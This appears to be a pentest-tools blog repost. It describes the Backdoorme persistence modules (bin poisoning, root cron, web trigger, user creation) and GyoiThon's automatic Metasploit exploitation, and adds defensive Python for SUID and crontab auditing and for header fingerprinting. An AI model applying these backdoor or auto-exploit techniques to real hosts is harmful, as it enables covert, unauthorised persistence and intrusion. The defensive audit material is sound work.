Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.
```
(msf) >> help
...
Poison module options:
Option     Value   Description                        Required
------     -----   -----------                        --------
name       ls      name of command to poison          False
location   /bin    where to put poisoned files into   False
```
Currently enabled modules include:
- Poison: Performs bin poisoning on the target computer. It compiles an executable to call a system utility and an existing backdoor. For example, if the bin poisoning module is triggered with "ls", it would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tricking a user into running an existing backdoor more frequently.
- Cron: Adds an existing backdoor to the root user's crontab to run with a given frequency.
- Web: Sets up a web server and places a web page which triggers the backdoor. Simply visit the site with your listener open and the backdoor will begin.
- User: Adds a new user to the target.
- Startup: Allows for backdoors to be spawned with the bashrc and init files.
- Whitelist: Whitelists an IP so that only that IP can connect to the backdoor.

Targets
Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.

Download Backdoorme
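The escalation backdoors and the Cron module described above all leave artifacts a host audit can find: a SUID bit on a binary that should not have one (nano), a SUID copy of a shell hidden as a dotfile (.bash), and root crontab entries pointing at hidden or world-writable paths. The Python below is an added example of that audit, not Backdoorme code; the file inventory and crontab are constructed, and the SUID allowlist is an assumption (build yours from a known-good image of the same distribution).

```python
"""Audit a host for the persistence artifacts described above: unexpected
SUID binaries, hidden SUID dotfiles, and suspicious root crontab entries.
Added example; not Backdoorme code."""
import os
import re
import stat

# Assumed allowlist of SUID binaries a stock host legitimately ships.
SUID_ALLOWLIST = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/newgrp",
}

# Constructed inventory of (path, st_mode) as os.lstat() would report it.
SAMPLE_FILES = [
    ("/usr/bin/sudo", 0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/nano", 0o104755),        # editor with SUID set: not normal
    ("/home/victim/.bash", 0o104755),   # hidden SUID copy of a shell
    ("/usr/bin/ls", 0o100755),
    ("/usr/bin/bash", 0o100755),
]

# Constructed root crontab; the first and last entries are benign.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
17 * * * * cd / && run-parts --report /etc/cron.hourly
*/2 * * * * /tmp/.x/update
@reboot /var/tmp/.cache/svc
0 3 * * * /usr/local/bin/backup.sh
"""

# Hidden path component, or anything under the usual world-writable dirs.
CRON_SUSPICIOUS_RE = re.compile(r"(^|/)\.[^/\s]+|/(tmp|var/tmp|dev/shm)/")


def suid_findings(files, allowlist=SUID_ALLOWLIST):
    """Return [(path, reason)] for regular files with the SUID bit set that are
    not on the allowlist; dotfiles get their own reason since they are the
    hidden-shell pattern."""
    out = []
    for path, mode in files:
        if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
            continue
        if path in allowlist:
            continue
        hidden = os.path.basename(path).startswith(".")
        out.append((path, "hidden SUID file" if hidden else "SUID outside allowlist"))
    return out


def walk_files(root="/"):
    """Real-host variant: build the (path, mode) inventory with os.lstat()."""
    files = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                files.append((path, os.lstat(path).st_mode))
            except OSError:
                continue
    return files


def crontab_findings(text):
    """Return [(schedule, command, reasons)] for entries worth a look. These
    are triage hints (a hidden or world-writable path, a very frequent or
    reboot-triggered job), not verdicts."""
    out = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        reasons = []
        if CRON_SUSPICIOUS_RE.search(command):
            reasons.append("hidden or world-writable path")
        if schedule.startswith("*/") or schedule == "@reboot":
            reasons.append("high frequency or reboot trigger")
        if reasons:
            out.append((schedule, command, reasons))
    return out


if __name__ == "__main__":
    print(suid_findings(SAMPLE_FILES))
    print(crontab_findings(SAMPLE_CRONTAB))
```

On a live host, `suid_findings(walk_files("/"))` gives the SUID report and the crontab text comes from the root crontab file under /var/spool/cron; comparing both against the previous run is more useful than a single snapshot, since the backdoors above are deployed after a compromise and show up as a diff.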

Link: http://feedproxy.google.com/~r/PentestTools/~3/tBsAiuIMyWY/backdoorme-powerful-auto-backdooring.html

GyoiThon – A Growing Penetration Test Tool Using Machine Learning

GyoiThon is a growing penetration test tool using machine learning. GyoiThon identifies the software installed on a web server (OS, middleware, framework, CMS, etc.) based on the learning data. After that, it executes valid exploits for the identified software using Metasploit. Finally, it generates reports of the scan results. GyoiThon executes the above processing automatically.

Processing steps
GyoiThon executes the above "Step 1" to "Step 4" fully automatically. The user's only operation is to input the top URL of the target web server in GyoiThon. It is very easy! You can identify vulnerabilities of web servers without taking time and effort.

Processing flow

Step 1. Gather HTTP responses.
GyoiThon gathers several HTTP responses of the target website while crawling. The following are examples of HTTP responses gathered by GyoiThon.

Example 1
```
HTTP/1.1 200 OK
Date: Tue, 06 Mar 2018 03:01:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Etag: "409ed-183-53c5f732641c0"
Content-Length: 15271
...snip...
```

Example 2
```
HTTP/1.1 200 OK
Date: Tue, 06 Mar 2018 06:56:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;path=/;
Content-Length: 37496
...snip...
```

Example 3
```
HTTP/1.1 200 OK
Date: Tue, 06 Mar 2018 04:19:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11819
...snip...
```
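The responses above carry software fingerprints even though none of them sends a Server header: Example 1's three-part ETag is the inode-size-mtime form Apache httpd emits by default, and Example 2's cookie name is a 32-character hex string, a naming pattern tied to the framework that set it. A site owner can run the same header inspection on their own responses to see what a learner like GyoiThon would pick up. The Python below is an added example, not GyoiThon code; it parses the page's three example responses (header portion only) and the signals it reports are the ones just described.

```python
"""Extract software-fingerprint signals from raw HTTP response headers, the
same inputs a learning-based identifier consumes. Added example; not GyoiThon
code. Inputs are the page's Example 1-3 responses, headers only."""
import re

EXAMPLE_1 = """HTTP/1.1 200 OK
Date: Tue, 06 Mar 2018 03:01:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Etag: "409ed-183-53c5f732641c0"
Content-Length: 15271
...snip..."""

EXAMPLE_2 = """HTTP/1.1 200 OK
Date: Tue, 06 Mar 2018 06:56:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;path=/;
Content-Length: 37496
...snip..."""

EXAMPLE_3 = """HTTP/1.1 200 OK
Date: Tue, 06 Mar 2018 04:19:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11819
...snip..."""


def parse_headers(raw):
    """Return (status_line, {lower_name: first_value}, [cookie names]).
    Lines without a colon (the '...snip...' marker, body text) are skipped."""
    lines = raw.strip().splitlines()
    status, headers, cookies = lines[0], {}, []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip().lower(), value.strip()
        if name == "set-cookie":
            cookies.append(value.split("=", 1)[0])
        else:
            headers.setdefault(name, value)
    return status, headers, cookies


def fingerprint_signals(raw):
    """Signals a fingerprinter can learn from, independent of a Server header."""
    status, headers, cookies = parse_headers(raw)
    etag = headers.get("etag", "").strip('"')
    return {
        "status": status,
        "server_disclosed": "server" in headers,
        "etag_parts": len(etag.split("-")) if etag else 0,
        "cookie_names": cookies,
        "hex32_cookie": any(re.fullmatch(r"[0-9a-f]{32}", c) for c in cookies),
    }


def leak_report(raw):
    """Human-readable findings for a hardening review of one response."""
    s = fingerprint_signals(raw)
    notes = []
    if s["server_disclosed"]:
        notes.append("Server header discloses software")
    if s["etag_parts"] == 3:
        notes.append("three-part ETag (inode-size-mtime form) matches Apache httpd's default FileETag")
    if s["hex32_cookie"]:
        notes.append("32-hex session cookie name is a framework-specific pattern")
    return notes


if __name__ == "__main__":
    for label, raw in (("Example 1", EXAMPLE_1), ("Example 2", EXAMPLE_2), ("Example 3", EXAMPLE_3)):
        print(label, leak_report(raw))
```

Example 3 yields no findings, which is the shape a hardened response takes: a fingerprinter then has to fall back on page content rather than headers. The corresponding fixes are on the server side (a less revealing FileETag setting and a renamed session cookie), outside this example.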